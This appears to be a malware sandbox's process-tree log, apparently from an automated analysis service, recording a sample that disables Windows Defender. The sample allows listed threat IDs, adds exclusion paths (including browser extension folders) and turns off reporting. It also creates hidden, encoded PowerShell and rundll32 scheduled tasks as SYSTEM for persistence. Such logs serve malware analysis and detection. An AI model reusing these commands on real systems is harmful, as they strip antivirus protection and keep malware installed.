C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:968 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:1164
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:2668
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:3888
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:3228
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:1416
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:4344
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:2968
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:388
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:1420
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:4240
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:3676
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:2876
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:3168
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:4268
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:4164
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:4720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:4536
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:4652
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:752
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:3416
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:3176
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:4908
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:800
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:1856
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:4700
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:1012
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:3692
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DDDIXrwIFTXkC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DDDIXrwIFTXkC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UJbqbYGEalpLkUITJzR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UJbqbYGEalpLkUITJzR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cvlBDCdIHRUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cvlBDCdIHRUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hlHvxOmTEzGU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hlHvxOmTEzGU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zYDdeyryU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zYDdeyryU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VYfzEhPxBNNTaEVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VYfzEhPxBNNTaEVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\jdyPdRrHtWvLsYfgt\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\jdyPdRrHtWvLsYfgt\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\zlCauFJzutozcZAJ\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\zlCauFJzutozcZAJ\" /t REG_DWORD /d 0 /reg:64;"2⤵PID:1060
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cvlBDCdIHRUn" /t REG_DWORD /d 0 /reg:323⤵PID:4380
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hlHvxOmTEzGU2" /t REG_DWORD /d 0 /reg:643⤵PID:4464
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:4640
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\zlCauFJzutozcZAJ /t REG_DWORD /d 0 /reg:643⤵PID:4240
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\zlCauFJzutozcZAJ /t REG_DWORD /d 0 /reg:323⤵PID:1440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\jdyPdRrHtWvLsYfgt /t REG_DWORD /d 0 /reg:643⤵PID:3368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\jdyPdRrHtWvLsYfgt /t REG_DWORD /d 0 /reg:323⤵PID:4196
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:4980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:2092
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:4220
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VYfzEhPxBNNTaEVB /t REG_DWORD /d 0 /reg:643⤵PID:2616
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VYfzEhPxBNNTaEVB /t REG_DWORD /d 0 /reg:323⤵PID:4236
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zYDdeyryU" /t REG_DWORD /d 0 /reg:643⤵PID:4676
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zYDdeyryU" /t REG_DWORD /d 0 /reg:323⤵PID:4428
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hlHvxOmTEzGU2" /t REG_DWORD /d 0 /reg:323⤵PID:3496
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cvlBDCdIHRUn" /t REG_DWORD /d 0 /reg:643⤵PID:4036
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UJbqbYGEalpLkUITJzR" /t REG_DWORD /d 0 /reg:643⤵PID:4916
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UJbqbYGEalpLkUITJzR" /t REG_DWORD /d 0 /reg:323⤵PID:1360
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DDDIXrwIFTXkC" /t REG_DWORD /d 0 /reg:643⤵PID:1504
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DDDIXrwIFTXkC" /t REG_DWORD /d 0 /reg:323⤵PID:2900
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gYrJUvLRf"2⤵PID:1416
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gYrJUvLRf" /SC once /ST 00:25:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:3228
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "qxdnhmFGwPNMbPaLO"2⤵PID:1900
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qxdnhmFGwPNMbPaLO" /SC once /ST 02:48:53 /RU "SYSTEM" /TR "\"C:\Windows\Temp\zlCauFJzutozcZAJ\HRJGqkvITgoVywn\kihxzCQ.exe\" 6V /zNsite_idjqZ 525403 /S" /V1 /F2⤵
- Creates scheduled task(s)
PID:836
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gYrJUvLRf"2⤵PID:5024
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3460 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:2900
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DDDIXrwIFTXkC" /t REG_DWORD /d 0 /reg:323⤵PID:1956
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4572
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4676
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:321⤵PID:4500
-
C:\Windows\Temp\zlCauFJzutozcZAJ\HRJGqkvITgoVywn\kihxzCQ.exeC:\Windows\Temp\zlCauFJzutozcZAJ\HRJGqkvITgoVywn\kihxzCQ.exe 6V /zNsite_idjqZ 525403 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4536 -
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:2968
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:4216
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\zlCauFJzutozcZAJ\vorQKlVs\HXnMzdU.dll",#1 /tBsite_idCkx 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:4216 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "CJutnrVhMflOHRfra"4⤵PID:4324
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\zYDdeyryU\XeaYeM.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "VgITaIvscZwKwBA" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2988
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:4964
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "btngLezmYLEbkDGphz"2⤵PID:3740
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "VgITaIvscZwKwBA"2⤵PID:2900
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:800
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "VgITaIvscZwKwBA"2⤵
- Suspicious use of WriteProcessMemory
PID:4920
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "SLQITUEPpopzsX" /F /xml "C:\Program Files (x86)\hlHvxOmTEzGU2\VNGHZNM.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1496
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LrQnDOtBbSHPj2" /F /xml "C:\ProgramData\VYfzEhPxBNNTaEVB\KkPoFlh.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1188
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "YnbtOrtOJHmhhNVIU2" /F /xml "C:\Program Files (x86)\UJbqbYGEalpLkUITJzR\IdGbxrm.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3664
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uNQkSyvwiQYktgVntFE2" /F /xml "C:\Program Files (x86)\DDDIXrwIFTXkC\XFXgLrP.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3876
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VgITaIvscZwKwBA2" /F /xml "C:\Program Files (x86)\zYDdeyryU\iIidkyK.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1840
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "CJutnrVhMflOHRfra" /SC once /ST 00:44:27 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\zlCauFJzutozcZAJ\vorQKlVs\HXnMzdU.dll\",#1 /tBsite_idCkx 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2928
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:976
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:320
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "qxdnhmFGwPNMbPaLO"2⤵PID:316
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵
- Suspicious use of WriteProcessMemory
PID:2896
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "CJutnrVhMflOHRfra"2⤵PID:4164
-
-
